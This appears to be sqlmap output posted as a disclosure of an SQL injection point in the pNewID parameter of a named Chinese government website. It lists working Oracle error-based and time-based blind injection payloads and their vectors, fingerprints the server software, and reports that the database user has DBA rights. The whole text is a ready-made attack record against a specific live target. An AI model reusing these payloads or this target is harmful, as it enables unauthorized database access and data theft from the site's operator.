注入点:http://www.wuhusrj.gov.cn/NewsDetail.aspx?pNewID=4764776 ------------------------------------------------------------------------ Place: GET Parameter: pNewID Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: pNewID=4764776' AND 4745=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(108)||CHR(99)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (4745=4745) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(97)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'PGcZ'='PGcZ Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: pNewID=4764776' AND 1985=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(67)||CHR(122)||CHR(79),5) AND 'xWjW'='xWjW Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) --- web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Oracle -------------------------------------------------------------------------------- current user: 'WEBDATA' current user is DBA: True -------------------------------------------------------------------------------
